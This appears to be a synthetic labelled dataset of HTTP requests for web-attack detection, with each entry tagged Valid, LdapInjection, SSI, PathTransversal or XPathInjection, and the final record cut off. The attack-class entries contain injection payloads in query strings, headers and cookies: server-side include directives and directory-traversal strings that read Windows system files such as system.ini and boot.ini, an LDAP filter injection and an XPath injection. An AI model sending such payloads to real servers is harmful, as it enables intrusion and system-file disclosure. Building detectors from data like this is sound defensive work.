~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19175
Start - Id: 38064
class: LdapInjection
GET /csDcsOlHCKw/pdNK/t8wm-AgA/KyogNBw.cfm?3WG0WEK9e=supdateldocuments%3Fs%40n++ikraeuts&ctl=iLiZFD&saisV8iEuisdq0i=%29++++%28+%7C+++%28e1rk%3D8edna*%29 HTTP/1.1
Host: www.TuSoI.uk
Connection: hmivRssh
Accept: text/*;q=0.2, audio/x-wav, image/gif
Accept-Charset: *
Accept-Encoding: gzip, compress, compress, gzip;q=0.7
Accept-Language: Oenetd-eri;q=0.0, eTzenBej-Irsk4aw;q=0.1
Cache-Control: only-if-cached
Client-ip: 163.227.108.150
Cookie: eDaob1sllzscnn=6118333292;iekcew=aCyYJEBq@utV
Cookie2: $Version="57"
Date: Tue, 25 Dec 07 19:33:29 GMT
ETag: "WyvG8K_AwpOUvCzMKd"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Sat, 12 Feb 05 01:00:36 UTC
If-Unmodified-Since: Sun, 14 Mar 04 19:05:37 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Jan 07 18:17:35 UTC
Max-Forwards: 6
MIME-Version: 7.3
Pragma: robMf='esns'
Proxy-Authorization: NTLM ZWNnaGFuZm8xbXI0dGhlbnl3dGg5cnNhZThyaTZjZW5hcnNFYXJjVGRl
Authorization: Basic ZXpzb206ZG9ybjYy
Range: 77-,76-
Referer: http://www.txghr.gov/fInhrla.tiff
TE: gzip;q=0.2
Trailer: Accept
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 3.2; En-it; rv:1.0.7) Gecko/44505322
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5823x093
Via: 8.2 32.42.123.12:6031, FTP/6.7 116.101.17.26:63, 2ha/1.9 www.ist6enno.png
Transfer-Encoding: compress
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 7355823651136546
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38064
Start - Id: 2755
class: Valid
GET /rqgx1eugtar/ni/c0y47YisOKWKeQ/41bz1s-wEq3DAf/r69rTtt1ilrnrdsy/uiGE.tiff? HTTP/1.0
Host: 90.244.78.90
Connection: 4hofsk
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic, iso-8859-9, koi8-r;q=0.1
Accept-Encoding: *
Accept-Language: esulo-ma, nesshn-et, ca-Ntm, Tu-n3ocl2;q=0.8
Cache-Control: min-fresh=17728
Client-ip: 205.37.124.236
Cookie: dyla5neessaaB2v= aprocessing-instructionnq2rboshentn;oelcwrSBe=tM27=;QpX8dVe=17
Cookie2: $Version="7"
Date: Thu, 22 Jul 04 01:25:48 GMT
ETag: "tM0h4IJKy1GWUH4D"
Expect: 100-continue
From: lqlhi@vaenn.fr
If-Modified-Since: Mon, 20 Jun 05 15:15:53 GMT
If-Unmodified-Since: Thu, 26 Mar 09 06:56:51 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 363
MIME-Version: 4.9
Pragma: nro='sla2L1i'
Proxy-Authorization: Digest realm
Authorization: o3t1cS otL4ea=et6ncym
Range: -75
Referer: /fsT2xfy/strIoyt.php4
TE: chunked,chunked,chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 4.3; m1-oh; rv:8.2.2) Gecko/87081594
UA-CPU: PowerPC
UA-Disp: 9580,602,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 738x004
Via: 7.7 246.110.46.23, 5.1 141.154.73.151, 9.4 136.181.190.136
Transfer-Encoding: deflate
Upgrade: xn47/8.4, esrand/2.5, wMro/9.9
Warning: 048 www.yigv.gif "cdtfsiao" "Mon, 13 Oct 08 01:16:56 UTC"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2755
Start - Id: 1354
class: Valid
GET /eoaohedc5sek4N6oCe/7d.php4?eiaaqt9hmiojdok=eogn9&fgndrsneztEL6=tNweIieer1thsx&F-M6T=hxterm&svziktnmTre=ekV_8Uu&wl0e5aeut=ennec&jeaaZfaooro7=eRNC&urnpCAEszw=hlwangSw&ozUeeOH8trsgtT=iiNw&eeamm=8&ueapeiNtpe=281397&Mvt=9199909687&nlIpr3hyu5eaezo=Usfv HTTP/1.1
Host: www.l7mghaOEm.ch
Connection: aiefet
Accept: audio/x-wav
Accept-Charset: iso-8859-6, iso-8859-2, x-mac-japanese
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 71.250.186.224
Cookie: enat1re=eui8o;3as0tomovnin=like0mtjo)lbrMftetboot.iniyhri;nH4ey=i@]processing-instruction? lgeorb?
Cookie2: $Version="315"
Date: Thu, 23 Nov 06 17:42:16 GMT
ETag: "WiopCSRqh9ng4.5Y"
Expect: rajicDn
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Fri, 30 Jan 09 08:36:31 GMT
If-Unmodified-Since: Wed, 29 Oct 08 19:16:19 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Apr 04 05:47:07 GMT
Max-Forwards: 1954
MIME-Version: 3.4
Pragma: eg7pudh='pbv'
Proxy-Authorization: ttfm iseeNej=Nuhbe6l
Authorization: NTLM ZTh5Zm10Y2VuZWVjY3NJcm1vbWFmaWVkbmFkc3BsRWthc2xl
Range: 518-86,86-,865-
Referer: http://1t4moe.net/esT7/b3e8jsd/2spa/60e8orc/ema9ezrk.exe
TE: deflate,chunked;q=0.5
Trailer: If-None-Match
User-Agent: pE-fh1sOV http://www.pyu0rfEn.biz
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 290x591
Via: FTP/6.7 www.aopsa.htm, FTP/0.5 www.ue35.css:256, FTP/0.8 171.228.40.72
Transfer-Encoding: deflate
Upgrade: yans3i/2.5
Warning: 525 2.204.107.239 "ls4rn" 
X-Forwarded-For: 185.64.155.53
X-Serial-Number: 814700
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1354
Start - Id: 40704
class: SSI
PUT /ecwk-1J_G3l6p.cfm? HTTP/1.0
Content-Length: 49
Content-Language: e,am
Content-Encoding: identity
Content-Location: http://asriao7.biz/ndetIp/sdtht.bin
Content-MD5: eXJobUFrbk9yZGk5dWZybA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 24 May 06 18:59:31 CET
Host: 162.188.222.81
Connection: keep-alive
Accept: application/postscript;q=0.4, video/mpeg;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.7, identity;q=0.1, identity, gzip, identity;q=0.5
Accept-Language: <!--    #include  virtual="c:\winnt\system.ini" -->
Cache-Control: max-age=6383
Client-ip: 81.128.85.227
Cookie2: $Version="334"
Date: Fri, 05 Mar 04 08:52:04 CET
Expect: omg8lsl
If-Unmodified-Since: Tue, 07 Oct 08 19:27:57 UTC
If-Range: *
Max-Forwards: 81
Pragma: no-cache
Authorization: nw4t vsoe=eaeeo8
Referer: /Hiadof/Rtnsil/dttr/Acl9oWd.js
TE: trailers,gzip;q=0.3,deflate
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 5.2; dh-va; rv:1.3.9) Gecko/26906445
UA-Disp: 8526,085,32
UA-Color: color16
Upgrade: hzo7/9.3, Eisrod/4.0, ejx/1.1, aH0t/6.3, ns3en/0.7
Warning: 949 116.210.136.159 "clysplwnhtrpns7zei" 
X-Serial-Number: 86139619564000429031

nStandJwpe6=lnw&eu4wuanz9wseyt=lNabfaq6nbpdsrohWt

End - Id: 40704
Start - Id: 45555
class: PathTransversal
GET /r07jh47yFpQDvhEx53C/j6CVBy4F9jrJa/s4st6iMhieonfl/dN7Le93ScCjl/ItYmt4hG9uKg.1P/dwreEPflGzucDsP/sttU3pXpHrj.css?1MPk5IM=ypxjis9dt&Fiu0tsmm7kxu=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fontiat%2Fan%2Fnaremealnt%2Fiema.sh&esztlSAehhS4H=ourgo+oe&etacddeseii=23863 HTTP/1.0
Host: www.EZshl2e0f1.st:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 225.212.174.38
Cookie: nori=tx8anAA
Cookie2: $Version="087"
Date: Sat, 12 Jan 08 05:25:38 GMT
ETag: "kYD21EH765dGrPJFf7j"
Expect: 100-continue
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Fri, 30 Mar 07 09:14:08 GMT
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: "jU.2GjVTt18oi7Xj"
If-Range: Tue, 10 Nov 09 23:51:34 GMT
Max-Forwards: 6175
MIME-Version: 3.3
Pragma: ot8ok='l'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: -7305
Referer: /Ssliuze/oMyihO/zhe8rdea/HaexpeC.php4
TE: chunked;q=0.8,deflate;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: tFln9mEltsGbirs
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: 7.9 38.83.179.127, 9.1 www.qa2smm.tiff
Transfer-Encoding: identity
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45555
Start - Id: 36192
class: PathTransversal
POST /faispoestddley/xseoet/QblExterm7PvbscriptkpyY/nJEmj-/wDwFJRAhX0WY/rL/3qUY3-WM4g/oNsHfltrqsnefbheo/s4XodtLdds0ax/fZ.--.7Fepbi_T/4to/eOilacnleE3.gif? HTTP/1.1
Content-Length: 234
Content-Language: n,vehvs,n
Content-Encoding: compress
Content-Location: /deif/eeIoehp/airftd.swf
Content-MD5: czBvOXlyb2llU2p5b0xlaQ==
Content-Type: application/x-www-form-urlencoded
Host: www.lloyeawl.be
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lxa2in3v-8a, tgtDtd-isn;q=0.7, Loe9-i8retdy6, vd-z4jafexb
Cache-Control: only-if-cached
Date: Thu, 19 Feb 09 16:14:34 UTC
If-Modified-Since: Mon, 08 Aug 05 16:16:27 GMT
If-None-Match: *
If-Range: "AwIMayz@9zbwpxifZof"
Max-Forwards: 5
Pragma: e=sjeun
Authorization: Basic TFhyc046c3Jtd2lobg==
Referer: http://www.7y2lna.cz/sze9sbd.mpg
User-Agent: 3:\windows\boot.ini
Via: FTP/8.7 www.DgT83L.shtml, 8.0 112.112.238.249, 7.3 www.fd3o.shtml
Upgrade: Ainn/1.8
X-Serial-Number: 32810419936666

sinrsddelesyvpc=hoj&tust=0686&er6erNsieTr=e&1s=epCS2&nLqrcS=tGAMTlBA&omectnec0tesmS=4&oizEmamuA=4545554&kTEratErncstnrQ=45847&epr1gogr=a2Pnii&lrfat=pif3QKK&Oscadrwa=sST5N&Rtgt=13059&nc0r=ti &dVLJLdV23=w5fformmerc8uanda7A&aftSfewmeb=re

End - Id: 36192
Start - Id: 48850
class: XPathInjection
GET /clio9t2bicssuea/sm5-M1MwQh9RFPG67/xtermh.Usxfx/41KgIjCs2QRY5Dy9wAiL/peuaashlxtedeotxseoa/rvX4NwC5.rBXbE9xK/tnuEp.exe?7eeyscT=ey%2Fz%2F4%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D332%5D+++++%7C+++++nm%2Feps%2FDd%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D++or++++%27awattoo%27+++%3D++%27&r0ctedot=d.W%40gYT&ds=89268 HTTP/1.1
Host: www.Vhrae5eey7.uk:80
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: iso-8859-2, iso-8859-8, iso-8859-15;q=0.7, x-mac-korean;q=0.1, ks_c_5601-1987;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=46
Client-ip: 250.77.251.179
Cookie: eneMi=fu;ecKsivso1xyvt=wget8openua2bmmone;htdoirdemHIaaa=aytTfainnsaoc;ae9ttnrwaeuatr=m2fl.sMT;smSt=20434747;uClog2=dmevgujfoecs
Cookie2: $Version="89"
Date: Tue, 24 Jun 08 13:42:23 CET
ETag: "ldC1WNmxlo0v8zvn"
Expect: 100-continue
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Mon, 03 Jan 05 24:46:48 UTC
If-Unmodified-Since: Mon, 09 Apr 07 08:37:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 893
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic aGlzMGVzM3Q6ZU5yaTJxYw==
Authorization: Basic cnNpbG86ZXNPOQ==
Range: 5-03627
Referer: http://www.tOLwuVen.ch/stat3t/eoi0h/eeweaati.tiff
TE: trailers
Trailer: Accept-Language
User-Agent: t0pdNcNg5hedHe0tHhni
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 412x876
Via: 3.3 www.k8eekecS.shtml:61, FTP/8.6 193.19.0.134, tao/8.4 www.tilfqe5i.htm
Transfer-Encoding: tEeso8
Upgrade: qdiue/5.0
Warning: 687 108.217.115.97 "lnedeee" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48850
Start - Id: 7603
class: Valid
POST /n1/ea/eAO6aBrHW0waK.srszk9/hl9@822HkogFl/dIAhpD/ancteeSsshsd7t/efkpILU.95twUjYGlGs/g58D6/Spcsgy.dll? HTTP/1.1
Content-Length: 45
Content-Language: izxy,s323,ie7
Content-Encoding: compress
Content-Location: /eTit/uniifcw/ehgs.sh
Content-MD5: ZHVyZk5vdG9IN2VoRUJsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Jul 06 04:41:24 GMT
Last-Modified: Thu, 06 Dec 07 18:56:22 CET
Host: www.8na7.uk
Connection: s33oeV
Accept: audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=51647
Client-ip: 59.181.165.188
Cookie: W8X=2duelonerdetkh1m8;yiSeeuaIae=n0b eafe;aezkDfs4Xoom7E=easmliwoOn;nreplaceLmUZDxr=mijfN;Yf0NJ9rTYPk=Rlt)ia==u&sg Osperl;8Kdhxlvyscript=orwgety
Date: Wed, 13 Dec 06 22:31:42 UTC
ETag: W/"0PHdY2@zRCRHtFUv4"
Expect: fI5lqf=emdr
If-Modified-Since: Sun, 11 Jun 06 12:23:54 CET
If-Unmodified-Since: Sat, 07 Apr 07 21:28:49 CET
If-Match: *
If-None-Match: *
If-Range: "ishb.2OJ1jNfO7ipDM0-"
Max-Forwards: 2
MIME-Version: 9.5
Pragma: no-cache
Authorization: Basic bGF0ZXVhOmk5NGFsRWV6
Range: 4990-,-42306,415-
Referer: http://www.p4c2ee.ch/to7ge/pPpwOon/e7pn/hTh9y/lw5iq.gif
TE: chunked;q=0.7
User-Agent: o@Af27IeL http://www.b9oyn.st
UA-OS: WinNT
UA-Color: color32
Via: Aadobn/8.1 17.172.145.198
Transfer-Encoding: identity
Upgrade: rOmVn/8.0
X-Forwarded-For: 223.150.236.173
----: -----------------------

laf=1792&aille=o&eemetnef=ehL.6&OteoOdacltu=a

End - Id: 7603
Start - Id: 40623
class: SSI
GET /eeBoputIwrehsehh/iD2vR0echoY/Lht/eeosbt/e0LjQ/thJrBw_VbHFs/nTrw/lCP5FSzqsVz.jsp?we9sUtg=im+o&5hQobteptm=%3C%21--+++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&eae92e=Eola&oas5vvYk=irh1oscoedexnyliio&.i4BUGYfxtermP=c0a&0Nzl2snyurt3ex=fjUd&nenteuhmA=5543&Hio1hcnoyws=snQGL_5-&eZno=zrdra&ao1fj=%29tapassthru%40ti%26&iRxduAaaXlusfo=niEeetctuloy HTTP/1.0
Host: 250.133.242.40:80
Connection: 1sneMtet
Accept: image/png;q=0.9, audio/x-wav
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: e-tsri;q=0.9, u-6udg;q=0.0, g-toe, eey-uprzOae
Cache-Control: no-cache
Client-ip: 134.67.83.123
Cookie: dssErcg=nEIZY7N5;teePhish=inv?txtermreini
Cookie2: $Version="10"
Date: Wed, 06 Apr 05 22:36:50 GMT
ETag: "BSYbTuX7wGz5Vkk"
Expect: 100-continue
From: aWtdN3pn@ecco.net
If-Modified-Since: Mon, 25 Feb 08 14:26:37 GMT
If-Unmodified-Since: Mon, 05 Jan 04 01:50:31 UTC
If-Match: "5lX5ryROWvL_9Dk80K-"
If-None-Match: *
If-Range: "CzLcEa@yb2GNdmbL"
Max-Forwards: 2309
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: 5dny iidu4=nicettyt
Authorization: NTLM bzVyb0VoeWxkaXVuU3BhZXV1cmRlZWFhbm1iZWczd3U4
Range: 656012-5
Referer: http://Oeipraea.it/n1y2segc/antjq.rar
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 5.8; tw-mt; rv:3.0.6) Gecko/85698375
UA-Disp: 959,926,32
Via: 5.3 111.165.15.166:62251, HTTP/3.8 www.emeasCnt.html, 9.2 129.166.88.180:1192
Transfer-Encoding: deflate
Upgrade: 43bua/6.8, mrble/6.7, ntta/4.0
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 5234187897202701
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40623
Start - Id: 27134
class: Valid
GET /3b/e9N8J/5m/eeWdDQtrCwE0s-jjLY/dsnvmaheqi8Hes8o/C4gosgubtsswoogtA/rplloLagolUacfo/Ie/tvVAiYZXdRHHvuO@Ew/tC46KbI91UX.js?xmf6ytt=%3B9hrtU-3us&6bgsoundrcp7ttV=xp_r&tq7uo5tc=rd HTTP/1.0
Host: 194.179.232.153
Connection: 7iape
Accept: image/jpeg;q=0.1, audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 48.50.170.183
Cookie: nTconnectHXPservicesq93T=18583393;ohxauogsllto=rX.;Kehdltssb=enrzsK0;nAi=48004760;oae9wneRntstaer=3489
Cookie2: $Version="2"
Date: Wed, 17 Oct 07 06:55:25 CET
ETag: W/"OWuaFez4Pvo@NDW8RV"
Expect: 100-continue
From: oafdmt@7uzsfmi.ch
If-Modified-Since: Mon, 25 Oct 04 08:53:30 UTC
If-Unmodified-Since: Sat, 25 Sep 04 12:33:03 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Mar 09 23:10:36 GMT
Max-Forwards: 945
MIME-Version: 4.2
Pragma: bicrKo=e
Proxy-Authorization: cDsd5 tanae3ex=Nmchr
Authorization: Digest username="S16ieotI"
Range: 876-071,453044-67,-1
Referer: http://dd2m9.biz/koidep/exsca.bin
TE: chunked;q=0.3
Trailer: Pragma
User-Agent: onysninntOEdy1ufhxe0
UA-CPU: Sparc
UA-Disp: 940,210,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 621x863
Via: cdanF/4.1 40.133.175.24:1022, FTP/5.6 www.dtoogon.png, rj2/0.2 www.aLhg.jpg
Transfer-Encoding: deflate
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27134
Start - Id: 4222
class: Valid
PUT /hj5HkSjfJmPXz8ydI/mu/agR6gc/b_l-1ol4nPqFbnd0/_j4W.js? HTTP/1.0
Content-Length: 214
Content-Language: s7mae,eudo0sd,7lav
Content-Encoding: identity
Content-Location: http://ndt0tr.st/hhsgrnh/eelS4r/indo/aedipa/SsSde.mdb
Content-MD5: OGltWnRhb284TmQ0N21rdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 22:02:45 GMT
Last-Modified: Fri, 18 Aug 06 14:56:46 GMT
Host: www.qsbcdce.net:2459
Connection: yeefg
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 39.254.93.91
Cookie: toOoir1Tmens=:sm;stSxclonWf9pu=7wrsgoeerBtb;osdilotTle=rIS;flin@lMyz=233
Cookie2: $Version="83"
Date: Tue, 13 Apr 10 11:24:54 UTC
ETag: W/"X-Jc8ESdz7CYeWwj"
Expect: 100-continue
From: hjihe3k@naahlyi3u2.ch
If-Modified-Since: Mon, 13 Nov 06 20:02:17 UTC
If-Unmodified-Since: Tue, 21 Mar 06 02:58:31 CET
If-Match: *
If-None-Match: "7DQgvaK027YjipoHa"
If-Range: *
Max-Forwards: 1013
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="a4tnm"
Range: -15,-05,72-397
Referer: http://oenis0.ch/vihe/eosnw/dsaqyko/yhibqo.wmn
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/4.1 (X11; U; Linux i586 7.9; sc-lN; rv:6.9.4) Gecko/62284395
UA-CPU: x86
UA-Disp: 030,366,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2347x8013
Via: HTTP/2.8 85.24.105.108
Transfer-Encoding: Ngvlha
Upgrade: 5ck/7.3
Warning: 544 www.hni2dj.shtml:11 "OemiccOl" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 1489164052019432947
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

dtuhEbrner6A=e&aQy3openGXh=6iFdheiiDoea&tnthCALNlsatttt=ssAyhitTo&tan=99144&t1r7nm1nog=ifihI6k&G6FGstdinliframeSDPTx=cti@2MgWZ849&honaIlsh=fq4tioyebiesosn&nasnennaassm=77&sii3oolta=c8az&e77sbn=Al0iyaoeGe&Tez=2281

End - Id: 4222
Start - Id: 21504
class: Valid
GET /ztUFJ@F5F/ibV6GmmengxSjT-D/ilkMz/MneiOiuh.shtml?o0neTsryrd3a=drl0aeaireteey&eteanhaac=mieWpassthru&e7ri222s=9DP8Wk4qzFn&m4s8=otdnehn%24&bTgo=nn8audyeyepz%7E%2B&1tlnf=cnryriardS6edrsis&aenmh4ddlgulR=iPar4UU&0Tqdsg9mtTon7e=3 HTTP/1.1
Host: 212.218.247.161
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 129.114.252.94
Cookie: MwNk=eAconnectyr1rt=unionX;so5hg;Ofengnycm=%l0dhnph-;_CF.AD.tCt=hhjias9ieoDj;Ivnohatluev=4097712
Cookie2: $Version="3"
Date: Wed, 13 Oct 04 19:21:18 GMT
ETag: W/"wm4JuCGS8MMcCC.Q"
Expect: 100-continue
From: 8whhees@Oeeq.net
If-Modified-Since: Thu, 21 Jan 10 08:41:32 CET
If-Unmodified-Since: Sat, 10 Jun 06 24:59:38 UTC
If-Match: *
If-None-Match: *
If-Range: "-sYKR7A9EzfdHmkbWpy"
Max-Forwards: 032
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic YW1yYjpydnVu
Authorization: Basic b0ExMDpwdUtiZVNveQ==
Range: 8137-,-4
Referer: /ossEfb/2ntas4.txt
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: rTatii
UA-CPU: Sparc
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 371x8138
Via: HTTP/1.1 105.146.14.101, HTTP/3.0 238.158.46.157
Transfer-Encoding: do8hss; sntEh=0jlytaam
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 278 www.noeiu.jpg "ddshudlt" 
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21504
Start - Id: 6578
class: Valid
POST /nS/mB_ezK11qR6.2Kl/llyhHnRmit/nzVNCe_COu.htm? HTTP/1.1
Content-Length: 267
Content-Language: mth
Content-Encoding: gzip
Content-Location: /desq/hFeo/aarnoisu/rnot/oeenn9sa.css
Content-MD5: cmd4MmVlcmZyc2VzcmhtZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 04 23:54:18 GMT
Last-Modified: Mon, 07 Dec 09 12:58:20 GMT
Host: 60.16.253.194
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: t9a-euua8;q=0.5, nlrsl-th, nek7uxem-eeca1lh
Cache-Control: no-transform
Client-ip: 169.133.240.139
Cookie: pDhnncdeg=imlcaeyh ;csonaftl=ies>solvarroe;s4fytui=9oe\;DNshhAfistreA7=39749
Cookie2: $Version="61"
Date: Wed, 21 Sep 05 09:50:12 UTC
ETag: "viI@pSKDL4kUvEhiJ"
Expect: 100-continue
From: w468@hwtta.org
If-Modified-Since: Wed, 12 Sep 07 14:07:36 CET
If-Unmodified-Since: Wed, 22 Aug 07 21:47:53 GMT
If-Match: "y@Q1QKpvlQJSM@Xk_L.@"
If-None-Match: "VymgAujv0GRvyMjUE8Kd"
If-Range: Thu, 09 Dec 04 22:49:27 GMT
Max-Forwards: 1
MIME-Version: 9.1
Pragma: q3perpE='elIel'
Proxy-Authorization: esibRe deeeiz9p=l3et
Authorization: NTLM MmVzZWlvbHJldGNhbGxyYWl1aXNnZThpZnRrZWVubEU=
Range: -45,964658-8
Referer: /noTbe/acte/otwdi/osap.jpeg
TE: trailers
Trailer: Accept
User-Agent: hDmihO4/2.7.1.4.7
UA-CPU: x86
UA-Disp: 1211,4867,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2928x871
Via: 2.8 141.105.141.25:3885
Transfer-Encoding: compress
Upgrade: bgy/1.7, oja/8.5, tabzh/3.4, eorhrr/0.2, 6ro/0.5
Warning: 015 www.S3hmat.js "rob00sy0uro5tLiaSgoN" 
X-Forwarded-For: 75.123.215.86
X-Serial-Number: 552358
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zufh6Enaad4P=c9vLTwedkMXi&neH09rtT4elshOn=logy:m&NCBV.a=$&edMnuiamrbyam1u=sIMN2U1GkDmc&er6a=2778150&ianh=edwt=mOanmntSo&uefcw=iyAp0'sfI7eol&rio8Iet=zdtet&2oasy3o=751&mHO8hxesv=pmlnt4erwnenrox&ejeed8i=1OKO0jBM&slo=8735&hixNdia=[gqto&acpOs4aP=lun99Mexlhearorx

End - Id: 6578
Start - Id: 45846
class: PathTransversal
GET /Icpwgetwhere.php?yEo=4rOrcmd&utsiamc2rdEas1a=926641048&ie=td0&uiPgeefr2hct=%3Fgroup+byq&niiecbnsaime=sTngaSress1f&VMFgBMlogOBR7=220417628&l9=Ms6Ala&2dYt=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&abnzng3t=bo&nR9erera=tP0hMiL3TcX&hotroicdtnr9=s_5UnW&rnaeumytnoewm=aLaOiiJMn5eH HTTP/1.0
Host: www.dlnsR9.it
Connection: keep-alive
Accept: video/*;q=0.0, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.8, deflate
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 145.76.47.201
Cookie: eolrs=tiad eeascript'Gai2htpass-dnt;Ohdwceen=620;w6noee8hl4wN=r
Cookie2: $Version="59"
Date: Fri, 13 Jul 07 03:33:05 CET
ETag: W/"aJyevn6vEVafqY5vIsv4"
Expect: 100-continue
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Mon, 21 Aug 06 12:44:36 GMT
If-Unmodified-Since: Sun, 19 Dec 04 04:58:37 CET
If-Match: "wCKfAVscJRiyLtAZJk."
If-None-Match: *
If-Range: Fri, 02 Jun 06 09:42:31 GMT
Max-Forwards: 781
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Digest qop=auth-int
Range: 505894-77
Referer: http://itetn.biz/nnSaeni/mhbeb/mexwg/moih/dwNi5e.dll
TE: deflate,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: lLidN0H.fm http://www.T2tuL4ce.cz
UA-CPU: Sparc
UA-Disp: 011,2094,16
UA-OS: WinNT
